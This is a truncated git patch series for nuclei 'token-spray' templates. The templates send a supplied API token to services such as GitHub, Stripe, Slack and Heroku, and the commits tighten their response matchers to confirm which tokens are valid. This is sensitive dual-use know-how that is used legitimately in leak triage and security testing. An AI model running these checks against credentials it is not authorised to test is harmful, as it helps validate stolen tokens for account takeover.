From 6d2214d670c54eb5e5fa88ec82b73d83eecc68a4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 1 Nov 2021 17:52:18 +0530 Subject: [PATCH 01/25] matchers updated --- token-spray/api-adafruit-io.yaml | 5 +++-- .../{apigee-edge.yaml => api-apigee-edge.yaml} | 7 ++++--- token-spray/api-appveyor.yaml | 5 +++-- token-spray/{asana.yaml => api-asana.yaml} | 11 +++++++---- token-spray/api-binance.yaml | 8 ++++---- token-spray/{bingmaps.yaml => api-bingmaps.yaml} | 0 token-spray/{bitly.yaml => api-bitly.yaml} | 5 +++-- token-spray/{buildkite.yaml => api-buildkite.yaml} | 11 +++++++---- token-spray/{buttercms.yaml => api-buttercms.yaml} | 11 +++++++---- token-spray/{calendly.yaml => api-calendly.yaml} | 10 +++++++--- token-spray/{circleci.yaml => api-circleci.yaml} | 9 ++++++--- token-spray/api-cooperhewitt.yaml | 10 +++++++--- token-spray/{deviantart.yaml => api-deviantart.yaml} | 5 ++--- token-spray/api-europeana.yaml | 10 +++++++--- token-spray/api-leanix.yaml | 5 +++-- token-spray/api-strava.yaml | 5 +++-- token-spray/api-taiga.yaml | 5 +++-- token-spray/api-thecatapi.yaml | 10 ++++++---- token-spray/api-webex.yaml | 6 ++++-- 19 files changed, 86 insertions(+), 52 deletions(-) rename token-spray/{apigee-edge.yaml => api-apigee-edge.yaml} (87%) rename token-spray/{asana.yaml => api-asana.yaml} (71%) rename token-spray/{bingmaps.yaml => api-bingmaps.yaml} (100%) rename token-spray/{bitly.yaml => api-bitly.yaml} (83%) rename token-spray/{buildkite.yaml => api-buildkite.yaml} (70%) rename token-spray/{buttercms.yaml => api-buttercms.yaml} (69%) rename token-spray/{calendly.yaml => api-calendly.yaml} (71%) rename token-spray/{circleci.yaml => api-circleci.yaml} (71%) rename token-spray/{deviantart.yaml => api-deviantart.yaml} (88%) diff --git a/token-spray/api-adafruit-io.yaml b/token-spray/api-adafruit-io.yaml index c9eb638d7d..5fc0e8d40c 100644 --- a/token-spray/api-adafruit-io.yaml +++ b/token-spray/api-adafruit-io.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "error" - negative: true + - '"username":' + - '"id":' + condition: and \ No newline at end of file diff --git a/token-spray/apigee-edge.yaml b/token-spray/api-apigee-edge.yaml similarity index 87% rename from token-spray/apigee-edge.yaml rename to token-spray/api-apigee-edge.yaml index 52c95af31a..e724933ea0 100644 --- a/token-spray/apigee-edge.yaml +++ b/token-spray/api-apigee-edge.yaml @@ -3,8 +3,8 @@ id: api-apigee-edge info: name: Apigee Edge API Test author: dwisiswant0 - reference: https://apidocs.apigee.com/apis severity: info + reference: https://apidocs.apigee.com/apis tags: token-spray,apigee self-contained: true @@ -24,5 +24,6 @@ requests: - type: word part: body words: - - "fault" - negative: true + - '"uuid":' + - '"name":' + condition: and diff --git a/token-spray/api-appveyor.yaml b/token-spray/api-appveyor.yaml index e1b8ee023e..25bac0e370 100644 --- a/token-spray/api-appveyor.yaml +++ b/token-spray/api-appveyor.yaml @@ -20,5 +20,6 @@ requests: - type: word part: body words: - - "Authorization required" - negative: true + - '"roleId":' + - '"created":' + condition: and \ No newline at end of file diff --git a/token-spray/asana.yaml b/token-spray/api-asana.yaml similarity index 71% rename from token-spray/asana.yaml rename to token-spray/api-asana.yaml index 482dc7bdd9..9608f3c236 100644 --- a/token-spray/asana.yaml +++ b/token-spray/api-asana.yaml @@ -16,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - 'data:' + - 'email' + - 'name' + condition: and diff --git a/token-spray/api-binance.yaml b/token-spray/api-binance.yaml index 064b6f6f1d..b2e24bbb78 100644 --- a/token-spray/api-binance.yaml +++ b/token-spray/api-binance.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - "Invalid API-key" - - "key format invalid" - condition: or - negative: true + - '"id":' + - '"price":' + - '"quoteQty":' + condition: and \ No newline at end of file diff --git a/token-spray/bingmaps.yaml b/token-spray/api-bingmaps.yaml similarity index 100% rename from token-spray/bingmaps.yaml rename to token-spray/api-bingmaps.yaml diff --git a/token-spray/bitly.yaml b/token-spray/api-bitly.yaml similarity index 83% rename from token-spray/bitly.yaml rename to token-spray/api-bitly.yaml index 01c70c7974..0a4c307e15 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/api-bitly.yaml @@ -16,6 +16,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'INVALID_ARG_ACCESS_TOKEN' + - '"long_url":' + - '"created_at":' + condition: and \ No newline at end of file diff --git a/token-spray/buildkite.yaml b/token-spray/api-buildkite.yaml similarity index 70% rename from token-spray/buildkite.yaml rename to token-spray/api-buildkite.yaml index 350b8edd1b..7855f0b53b 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/api-buildkite.yaml @@ -16,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"id":' + - '"graphql_id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/token-spray/buttercms.yaml b/token-spray/api-buttercms.yaml similarity index 69% rename from token-spray/buttercms.yaml rename to token-spray/api-buttercms.yaml index 15d86d53fe..21b6d1dff1 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/api-buttercms.yaml @@ -14,7 +14,10 @@ requests: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"meta":' + - '"data":' + - '"url":' + condition: and \ No newline at end of file diff --git a/token-spray/calendly.yaml b/token-spray/api-calendly.yaml similarity index 71% rename from token-spray/calendly.yaml rename to token-spray/api-calendly.yaml index b54a5c8df8..10a8e83478 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/api-calendly.yaml @@ -16,6 +16,10 @@ requests: X-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/token-spray/circleci.yaml b/token-spray/api-circleci.yaml similarity index 71% rename from token-spray/circleci.yaml rename to token-spray/api-circleci.yaml index d519f10651..cfe7672786 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/api-circleci.yaml @@ -14,6 +14,9 @@ requests: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/token-spray/api-cooperhewitt.yaml b/token-spray/api-cooperhewitt.yaml index 339f8ed1b2..a15d91a73e 100644 --- a/token-spray/api-cooperhewitt.yaml +++ b/token-spray/api-cooperhewitt.yaml @@ -14,6 +14,10 @@ requests: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"stat":' + - '"formats":' + - '"default_format":' + condition: and diff --git a/token-spray/deviantart.yaml b/token-spray/api-deviantart.yaml similarity index 88% rename from token-spray/deviantart.yaml rename to token-spray/api-deviantart.yaml index ab73e7ea0d..b09e9acd2b 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/api-deviantart.yaml @@ -3,8 +3,8 @@ id: api-deviantart info: name: DeviantArt API Test author: zzeitlin - reference: https://www.deviantart.com/developers/authentication severity: info + reference: https://www.deviantart.com/developers/authentication tags: token-spray,deviantart self-contained: true @@ -18,5 +18,4 @@ requests: - type: word part: body words: - - '"status":"error"' - negative: true + - '"status" : "success"' diff --git a/token-spray/api-europeana.yaml b/token-spray/api-europeana.yaml index 69c55b1560..527bf6dd4c 100644 --- a/token-spray/api-europeana.yaml +++ b/token-spray/api-europeana.yaml @@ -14,6 +14,10 @@ requests: - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - 'success' + - 'apikey' + - 'action' + condition: and \ No newline at end of file diff --git a/token-spray/api-leanix.yaml b/token-spray/api-leanix.yaml index 53be0b6e95..172d00ec30 100644 --- a/token-spray/api-leanix.yaml +++ b/token-spray/api-leanix.yaml @@ -21,5 +21,6 @@ requests: - type: word part: body words: - - "Credentials are required" - negative: true + - '"input":' + - '"connectorType":' + condition: and \ No newline at end of file diff --git a/token-spray/api-strava.yaml b/token-spray/api-strava.yaml index b7ec7eb8b9..f81d4897ba 100644 --- a/token-spray/api-strava.yaml +++ b/token-spray/api-strava.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "Authorization Error" - negative: true + - '"id"' + - '"username"' + condition: and diff --git a/token-spray/api-taiga.yaml b/token-spray/api-taiga.yaml index b22fc01cf8..6e8748bdf1 100644 --- a/token-spray/api-taiga.yaml +++ b/token-spray/api-taiga.yaml @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - "token_not_valid" - negative: true + - '"auth_code":' + - '"state":' + condition: and diff --git a/token-spray/api-thecatapi.yaml b/token-spray/api-thecatapi.yaml index f8399778d8..b5c7dab4ac 100644 --- a/token-spray/api-thecatapi.yaml +++ b/token-spray/api-thecatapi.yaml @@ -16,7 +16,9 @@ requests: x-api-key: "{{token}}" matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - '"country_code":' + - '"created_at":' + condition: and diff --git a/token-spray/api-webex.yaml b/token-spray/api-webex.yaml index e8f60ed51b..c5e61ded0b 100644 --- a/token-spray/api-webex.yaml +++ b/token-spray/api-webex.yaml @@ -19,5 +19,7 @@ requests: - type: word part: body words: - - "errors" - negative: true + - 'id' + - 'title' + - 'type' + condition: and From dc81d636301f68c9c44d7dc9c785efba04a5556f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Nov 2021 10:49:21 +0530 Subject: [PATCH 02/25] matcher fixed --- token-spray/{dropbox.yaml => api-dropbox.yaml} | 9 ++++++--- token-spray/{facebook.yaml => api-facebook.yaml} | 0 .../{fontawesome.yaml => api-fontawesome.yaml} | 5 +++-- ...itoken-cloud.yaml => api-fortitoken-cloud.yaml} | 0 token-spray/{github.yaml => api-github.yaml} | 4 +++- .../{sonarcloud.yaml => api-sonarcloud.yaml} | 4 ++-- token-spray/{spotify.yaml => api-spotify.yaml} | 14 +++++++++----- token-spray/{stripe.yaml => api-stripe.yaml} | 12 ++++++++---- token-spray/{tink.yaml => api-tink.yaml} | 0 token-spray/{tinypng.yaml => api-tinypng.yaml} | 0 token-spray/{twitter.yaml => api-twitter.yaml} | 7 ++++--- .../{visualstudio.yaml => api-visualstudio.yaml} | 8 +++++--- token-spray/{wakatime.yaml => api-wakatime.yaml} | 13 ++++++++----- token-spray/{weglot.yaml => api-weglot.yaml} | 0 token-spray/{youtube.yaml => api-youtube.yaml} | 9 +++------ 15 files changed, 51 insertions(+), 34 deletions(-) rename token-spray/{dropbox.yaml => api-dropbox.yaml} (75%) rename token-spray/{facebook.yaml => api-facebook.yaml} (100%) rename token-spray/{fontawesome.yaml => api-fontawesome.yaml} (86%) rename token-spray/{fortitoken-cloud.yaml => api-fortitoken-cloud.yaml} (100%) rename token-spray/{github.yaml => api-github.yaml} (84%) rename token-spray/{sonarcloud.yaml => api-sonarcloud.yaml} (93%) rename token-spray/{spotify.yaml => api-spotify.yaml} (61%) rename token-spray/{stripe.yaml => api-stripe.yaml} (70%) rename token-spray/{tink.yaml => api-tink.yaml} (100%) rename token-spray/{tinypng.yaml => api-tinypng.yaml} (100%) rename token-spray/{twitter.yaml => api-twitter.yaml} (82%) rename token-spray/{visualstudio.yaml => api-visualstudio.yaml} (82%) rename token-spray/{wakatime.yaml => api-wakatime.yaml} (67%) rename token-spray/{weglot.yaml => api-weglot.yaml} (100%) rename token-spray/{youtube.yaml => api-youtube.yaml} (80%) diff --git a/token-spray/dropbox.yaml b/token-spray/api-dropbox.yaml similarity index 75% rename from token-spray/dropbox.yaml rename to token-spray/api-dropbox.yaml index 339837160e..cc14c60421 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/api-dropbox.yaml @@ -16,6 +16,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"account_id":' + - '"email":' + condition: and diff --git a/token-spray/facebook.yaml b/token-spray/api-facebook.yaml similarity index 100% rename from token-spray/facebook.yaml rename to token-spray/api-facebook.yaml diff --git a/token-spray/fontawesome.yaml b/token-spray/api-fontawesome.yaml similarity index 86% rename from token-spray/fontawesome.yaml rename to token-spray/api-fontawesome.yaml index 10ec8d5ff5..3a990014df 100644 --- a/token-spray/fontawesome.yaml +++ b/token-spray/api-fontawesome.yaml @@ -24,5 +24,6 @@ requests: - type: word part: body words: - - "No active API token" - negative: true + - '"access_token":' + - '"scopes":' + condition: and diff --git a/token-spray/fortitoken-cloud.yaml b/token-spray/api-fortitoken-cloud.yaml similarity index 100% rename from token-spray/fortitoken-cloud.yaml rename to token-spray/api-fortitoken-cloud.yaml diff --git a/token-spray/github.yaml b/token-spray/api-github.yaml similarity index 84% rename from token-spray/github.yaml rename to token-spray/api-github.yaml index 4722dfe6d3..764b42e28c 100644 --- a/token-spray/github.yaml +++ b/token-spray/api-github.yaml @@ -19,4 +19,6 @@ requests: - type: word part: body words: - - 'login' + - '"login":' + - '"avatar_url":' + condition: and diff --git a/token-spray/sonarcloud.yaml b/token-spray/api-sonarcloud.yaml similarity index 93% rename from token-spray/sonarcloud.yaml rename to token-spray/api-sonarcloud.yaml index aed9d1760f..97831db0bd 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/api-sonarcloud.yaml @@ -3,8 +3,8 @@ id: api-sonarcloud info: name: SonarCloud API Test author: zzeitlin - reference: https://sonarcloud.io/web_api/api/authentication severity: info + reference: https://sonarcloud.io/web_api/api/authentication tags: token-spray,sonarcloud self-contained: true @@ -19,4 +19,4 @@ requests: - type: word part: body words: - - 'true' + - '{"valid": true}' diff --git a/token-spray/spotify.yaml b/token-spray/api-spotify.yaml similarity index 61% rename from token-spray/spotify.yaml rename to token-spray/api-spotify.yaml index 01f1d80084..ee518e36b4 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/api-spotify.yaml @@ -3,19 +3,23 @@ id: api-spotify info: name: Spotify API Test author: zzeitlin - reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ tags: token-spray,spotify self-contained: true requests: - method: GET path: - - "https://api.spotify.com/v1/me" + - "https://api.spotify.com/v1/me/player/devices" headers: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/token-spray/stripe.yaml b/token-spray/api-stripe.yaml similarity index 70% rename from token-spray/stripe.yaml rename to token-spray/api-stripe.yaml index 50e8979aa7..d06b38bd8c 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/api-stripe.yaml @@ -3,8 +3,8 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file diff --git a/token-spray/tink.yaml b/token-spray/api-tink.yaml similarity index 100% rename from token-spray/tink.yaml rename to token-spray/api-tink.yaml diff --git a/token-spray/tinypng.yaml b/token-spray/api-tinypng.yaml similarity index 100% rename from token-spray/tinypng.yaml rename to token-spray/api-tinypng.yaml diff --git a/token-spray/twitter.yaml b/token-spray/api-twitter.yaml similarity index 82% rename from token-spray/twitter.yaml rename to token-spray/api-twitter.yaml index ec654b2782..ce6de967e8 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/api-twitter.yaml @@ -3,8 +3,8 @@ id: api-twitter info: name: Twitter API Test author: zzeitlin - reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index severity: info + reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index tags: token-spray,twitter self-contained: true @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - 'error' - negative: true + - '"account_name":' + - '"subscriptions_count_all":' + condition: and diff --git a/token-spray/visualstudio.yaml b/token-spray/api-visualstudio.yaml similarity index 82% rename from token-spray/visualstudio.yaml rename to token-spray/api-visualstudio.yaml index e7c0a0a2f8..a3440fdb9a 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/api-visualstudio.yaml @@ -3,8 +3,8 @@ id: api-visualstudio info: name: Visual Studio API Test author: zzeitlin - reference: https://openapi.appcenter.ms/ severity: info + reference: https://openapi.appcenter.ms/ tags: token-spray,visualstudio,microsoft self-contained: true @@ -19,6 +19,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unauthorized' + - '"id":' + - '"description":' + - '"owner":' + condition: and diff --git a/token-spray/wakatime.yaml b/token-spray/api-wakatime.yaml similarity index 67% rename from token-spray/wakatime.yaml rename to token-spray/api-wakatime.yaml index 7237446fce..07755c952b 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/api-wakatime.yaml @@ -3,8 +3,8 @@ id: api-wakatime info: name: WakaTime CI API Test author: zzeitlin - reference: https://wakatime.com/developers severity: info + reference: https://wakatime.com/developers tags: token-spray,wakatime self-contained: true @@ -14,7 +14,10 @@ requests: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"data":' + - '"seconds":' + - '"is_up_to_date":' + condition: and diff --git a/token-spray/weglot.yaml b/token-spray/api-weglot.yaml similarity index 100% rename from token-spray/weglot.yaml rename to token-spray/api-weglot.yaml diff --git a/token-spray/youtube.yaml b/token-spray/api-youtube.yaml similarity index 80% rename from token-spray/youtube.yaml rename to token-spray/api-youtube.yaml index 8c1384579b..be1531a453 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/api-youtube.yaml @@ -13,13 +13,10 @@ requests: path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - matchers-condition: or matchers: - type: word part: body words: - - 'quotaExceeded' - - - type: status - status: - - 200 + - '"kind":' + - '"pageInfo":' + condition: and \ No newline at end of file From 462c4f7b12fbc0db137636d07c7ca75ce93c2ed6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 10 Nov 2021 15:05:20 +0530 Subject: [PATCH 03/25] more changes --- token-spray/{heroku.yaml => api-heroku.yaml} | 13 ++++++------- token-spray/{hubspot.yaml => api-hubspot.yaml} | 17 +++++++++++++---- .../{instagram.yaml => api-instagram.yaml} | 12 ++++++++---- .../{intercom.yaml => api-intercom.yaml} | 0 token-spray/{ipstack.yaml => api-ipstack.yaml} | 8 +++++--- .../{iterable.yaml => api-iterable.yaml} | 10 +++++----- .../{jumpcloud.yaml => api-jumpcloud.yaml} | 7 ++++--- .../{linkedin.yaml => api-linkedin.yaml} | 6 ++++-- .../{lokalise.yaml => api-lokalise.yaml} | 16 ++++++++++------ token-spray/{loqate.yaml => api-loqate.yaml} | 4 ++-- .../{mailchimp.yaml => api-mailchimp.yaml} | 2 +- token-spray/{mailgun.yaml => api-mailgun.yaml} | 12 ++++++++---- token-spray/{mapbox.yaml => api-mapbox.yaml} | 11 +++++++---- .../{nerdgraph.yaml => api-nerdgraph.yaml} | 2 +- token-spray/{netlify.yaml => api-netlify.yaml} | 12 ++++++++---- token-spray/{npm.yaml => api-npm.yaml} | 4 ++-- .../{onelogin.yaml => api-onelogin.yaml} | 16 ++++++++++------ .../{openweather.yaml => api-openweather.yaml} | 12 ++++++++---- .../{optimizely.yaml => api-optimizely.yaml} | 6 ++++-- .../{pagerduty.yaml => api-pagerduty.yaml} | 12 +++++++----- token-spray/{paypal.yaml => api-paypal.yaml} | 0 token-spray/{pendo.yaml => api-pendo.yaml} | 13 +++++++------ ...otaltracker.yaml => api-pivotaltracker.yaml} | 1 + .../{postmark.yaml => api-postmark.yaml} | 14 +++++++++----- .../{sendgrid.yaml => api-sendgrid.yaml} | 2 +- token-spray/{slack.yaml => api-slack.yaml} | 6 ++++-- .../{travisci.yaml => api-travisci.yaml} | 2 +- 27 files changed, 136 insertions(+), 84 deletions(-) rename token-spray/{heroku.yaml => api-heroku.yaml} (76%) rename token-spray/{hubspot.yaml => api-hubspot.yaml} (54%) rename token-spray/{instagram.yaml => api-instagram.yaml} (55%) rename token-spray/{intercom.yaml => api-intercom.yaml} (100%) rename token-spray/{ipstack.yaml => api-ipstack.yaml} (79%) rename token-spray/{iterable.yaml => api-iterable.yaml} (55%) rename token-spray/{jumpcloud.yaml => api-jumpcloud.yaml} (85%) rename token-spray/{linkedin.yaml => api-linkedin.yaml} (82%) rename token-spray/{lokalise.yaml => api-lokalise.yaml} (55%) rename token-spray/{loqate.yaml => api-loqate.yaml} (73%) rename token-spray/{mailchimp.yaml => api-mailchimp.yaml} (100%) rename token-spray/{mailgun.yaml => api-mailgun.yaml} (70%) rename token-spray/{mapbox.yaml => api-mapbox.yaml} (71%) rename token-spray/{nerdgraph.yaml => api-nerdgraph.yaml} (100%) rename token-spray/{netlify.yaml => api-netlify.yaml} (70%) rename token-spray/{npm.yaml => api-npm.yaml} (90%) rename token-spray/{onelogin.yaml => api-onelogin.yaml} (58%) rename token-spray/{openweather.yaml => api-openweather.yaml} (69%) rename token-spray/{optimizely.yaml => api-optimizely.yaml} (85%) rename token-spray/{pagerduty.yaml => api-pagerduty.yaml} (76%) rename token-spray/{paypal.yaml => api-paypal.yaml} (100%) rename token-spray/{pendo.yaml => api-pendo.yaml} (74%) rename token-spray/{pivotaltracker.yaml => api-pivotaltracker.yaml} (94%) rename token-spray/{postmark.yaml => api-postmark.yaml} (63%) rename token-spray/{sendgrid.yaml => api-sendgrid.yaml} (100%) rename token-spray/{slack.yaml => api-slack.yaml} (80%) rename token-spray/{travisci.yaml => api-travisci.yaml} (100%) diff --git a/token-spray/heroku.yaml b/token-spray/api-heroku.yaml similarity index 76% rename from token-spray/heroku.yaml rename to token-spray/api-heroku.yaml index ef81ec91e8..ef9b58c7ae 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/api-heroku.yaml @@ -17,10 +17,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - condition: or - status: - - 200 - - 201 - - 202 - - 206 + - type: word + part: body + words: + - '"created_at":' + - '"git_url":' + condition: and \ No newline at end of file diff --git a/token-spray/hubspot.yaml b/token-spray/api-hubspot.yaml similarity index 54% rename from token-spray/hubspot.yaml rename to token-spray/api-hubspot.yaml index da95a4b12a..4526b146f6 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/api-hubspot.yaml @@ -3,8 +3,8 @@ id: api-hubspot info: name: HubSpot API Test author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners severity: info + reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners tags: token-spray,hubspot self-contained: true @@ -12,11 +12,20 @@ requests: - method: GET path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" + - "https://api.hubapi.com/contacts/v1/lists/static?count=3&hapikey={{token}}" + matchers-condition: or matchers: - type: word part: body words: - - 'error' - negative: true + - '"portalId":' + - '"ownerId":' + condition: and + + - type: word + part: body + words: + - '"metaData":' + - '"portalId":' + condition: and \ No newline at end of file diff --git a/token-spray/instagram.yaml b/token-spray/api-instagram.yaml similarity index 55% rename from token-spray/instagram.yaml rename to token-spray/api-instagram.yaml index dd851bee3e..fc463c8bac 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/api-instagram.yaml @@ -11,9 +11,13 @@ self-contained: true requests: - method: GET path: - - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"access_token":' + - '"name":' + condition: and diff --git a/token-spray/intercom.yaml b/token-spray/api-intercom.yaml similarity index 100% rename from token-spray/intercom.yaml rename to token-spray/api-intercom.yaml diff --git a/token-spray/ipstack.yaml b/token-spray/api-ipstack.yaml similarity index 79% rename from token-spray/ipstack.yaml rename to token-spray/api-ipstack.yaml index ac527d2a1e..8f560a1b34 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/api-ipstack.yaml @@ -3,8 +3,8 @@ id: api-ipstack info: name: IPStack API Test author: zzeitlin - reference: https://ipstack.com/documentation severity: info + reference: https://ipstack.com/documentation tags: token-spray,ipstack self-contained: true @@ -16,6 +16,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'invalid_access_key' + - '"ip":' + - '"hostname":' + - '"type":' + condition: and diff --git a/token-spray/iterable.yaml b/token-spray/api-iterable.yaml similarity index 55% rename from token-spray/iterable.yaml rename to token-spray/api-iterable.yaml index 69da55de5d..b559444b8f 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/api-iterable.yaml @@ -3,22 +3,22 @@ id: api-iterable info: name: Iterable API Test author: zzeitlin - reference: https://api.iterable.com/api/docs severity: info + reference: https://api.iterable.com/api/docs tags: token-spray,iterable self-contained: true requests: - method: GET path: - - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" + - "https://api.iterable.com/api/catalogs" headers: Api_Key: "{{token}}" matchers: - type: word part: body - negative: true words: - - 'BadApiKey' - - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve + - '"name":' + - '"catalogNames":' + condition: and diff --git a/token-spray/jumpcloud.yaml b/token-spray/api-jumpcloud.yaml similarity index 85% rename from token-spray/jumpcloud.yaml rename to token-spray/api-jumpcloud.yaml index dbf3c9ab35..6b9dc68d93 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/api-jumpcloud.yaml @@ -3,8 +3,8 @@ id: api-jumpcloud info: name: JumpCloud API Test author: zzeitlin - reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key severity: info + reference: https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key tags: token-spray,jumpcloud self-contained: true @@ -18,6 +18,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unauthorized' + - '"_id":' + - '"agentServer":' + condition: and diff --git a/token-spray/linkedin.yaml b/token-spray/api-linkedin.yaml similarity index 82% rename from token-spray/linkedin.yaml rename to token-spray/api-linkedin.yaml index 611f28d422..3631ace894 100644 --- a/token-spray/linkedin.yaml +++ b/token-spray/api-linkedin.yaml @@ -21,6 +21,8 @@ requests: - type: word part: body - negative: true words: - - "serviceErrorCode" \ No newline at end of file + - '"id":' + - '"firstName":' + - '"localized":' + condition: and \ No newline at end of file diff --git a/token-spray/lokalise.yaml b/token-spray/api-lokalise.yaml similarity index 55% rename from token-spray/lokalise.yaml rename to token-spray/api-lokalise.yaml index 5003f25b31..c513a20064 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/api-lokalise.yaml @@ -3,19 +3,23 @@ id: api-lokalise info: name: Lokalise API Test author: zzeitlin - reference: https://app.lokalise.com/api2docs/curl/#resource-projects severity: info + reference: https://app.lokalise.com/api2docs/curl/#resource-projects tags: token-spray,lokalise self-contained: true requests: - method: GET path: - - "https://api.lokalise.com/api2/projects/" + - "https://api.lokalise.com/api2/teams" headers: - X-Api-Token: "{{token}}" + x-api-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"teams":' + - '"team_id":' + - '"name":' + condition: and \ No newline at end of file diff --git a/token-spray/loqate.yaml b/token-spray/api-loqate.yaml similarity index 73% rename from token-spray/loqate.yaml rename to token-spray/api-loqate.yaml index dcbf5b156d..10fa82f23a 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/api-loqate.yaml @@ -3,15 +3,15 @@ id: api-loqate info: name: Loqate API Test author: zzeitlin - reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ severity: info + reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ tags: token-spray,loqate self-contained: true requests: - method: GET path: - - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + - "https://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" matchers: - type: word diff --git a/token-spray/mailchimp.yaml b/token-spray/api-mailchimp.yaml similarity index 100% rename from token-spray/mailchimp.yaml rename to token-spray/api-mailchimp.yaml index d25870e279..5232ddda97 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/api-mailchimp.yaml @@ -3,8 +3,8 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration severity: info + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration tags: token-spray,mailchimp self-contained: true diff --git a/token-spray/mailgun.yaml b/token-spray/api-mailgun.yaml similarity index 70% rename from token-spray/mailgun.yaml rename to token-spray/api-mailgun.yaml index c4997aaaa4..dfa06bdfaa 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/api-mailgun.yaml @@ -3,8 +3,8 @@ id: api-mailgun info: name: Mailgun API Test author: zzeitlin - reference: https://documentation.mailgun.com/en/latest/api-intro.html severity: info + reference: https://documentation.mailgun.com/en/latest/api-intro.html tags: token-spray,mailgun self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Basic {{base64('api:' + token)}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"total_count":' + - 